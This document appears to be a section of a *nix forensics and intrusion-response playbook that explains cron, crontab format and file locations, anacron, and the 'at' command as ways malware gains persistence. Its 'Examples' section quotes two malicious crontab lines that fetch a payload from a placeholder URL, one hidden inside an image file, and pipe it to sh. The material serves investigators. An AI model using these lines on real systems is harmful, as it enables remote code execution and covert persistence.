Cron Jobs

Cron is a time-based job scheduler in *nix operating systems. It allows users to schedule commands or scripts to run at specific times or intervals. Cron jobs are often used to automate tasks, such as backups, file maintenance, and software updates. Unfortunately, it can also be leveraged by malicious actors for malware persistence.

There are two executables of note. crond - this is the deamon program that run in the background and is responsible for executing the cron jobs. crond reads the crontab (cron table) file. The execution schedule is defined in a simple text format and contains the following. ¹

The time or interval at which the job should run
The command or script that should be run
The user that should run the job

These files can be system-wide or user specific.

Crontab File format

A cron job is defined by a single line in a crontab file, structured as follows:


* * * * * command-to-be-executed
- - - - -
| | | | |
| | | | ----- Day of the week (0 - 7) (Sunday = 0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of the month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)

Each field can contain a single number, a comma-separated list of numbers, a range of numbers, or an asterisk (representing all possible numbers).

The second executable is crontab which is used to manage the crontab files. crontab -e can be used to edit the crontab file.

Examples

*/11 * * * * wget -O - -q http://<malicious_url>/pics/logo.jpg|sh

*/5 * * * * curl http://<malicious_url>/malicious.png -k|dd skip=2446 bs=1|sh

Managing crontab entries:

crontab -l lists the current user's crontab entries.
crontab -e opens the user's crontab file for editing.
crontab -r removes the user's crontab file.

User Crontab file locations

The crontab files for individual users are stored in the /var/spool/cron directory. Each user's crontab file has the same name as the username.

For example, the crontab file for the cbeard user would be at /var/spool/cron/cbeard.

System-wide cron jobs are also stored in the /etc/crontab file. The /etc/cron.d/ directory also stores system-wide cron files, where each file represents a separate cron job.

Scheduling with anacron

anacron is similar to cron in that it is also used for running scheduled tasks².

The primary difference between anacron and cron is how they handle missed or skipped jobs. In cron, if a system is powered off or inactive at the scheduled time of a task, the task will not be executed. anacron is designed to address this limitation by allowing the execution of missed tasks when the system becomes active again.

System-wide tasks are defined in the main configuration file (/etc/anacrontab), while user-specific tasks are defined in separate per-user configuration files located in /var/spool/anacron/

System Crontab file locations

System packages schedule jobs by placing scripts in the /etc/cron.d folder.

/etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly: These directories contain scripts that run every hour, day, week, or month, respectively. Jobs can be scheduled by placing script files in these folder locations. The cron daemon will run the scripts per the schedule.

Task scheduling using the 'at' command

The at command in can be used to schedule one-time tasks or commands to run at a specific time in the future. It is particularly useful for scheduling jobs that need to run only once, without any recurring pattern.

Note that at command job history cannot be recovered as the entry is purged from the job queue after the task execution.

The queue can be inspected as follows

cat /var/spool/at/<job_id>

cat /var/spool/at/spool/<job_id>

https://linuxconfig.org/how-to-run-commands-periodically-with-anacron-on-linux ¹: < https://sandflysecurity.com/blog/linux-malware-persistence-with-cron/ >

Digital forensics & Intrusion Response Playbook - *nix OS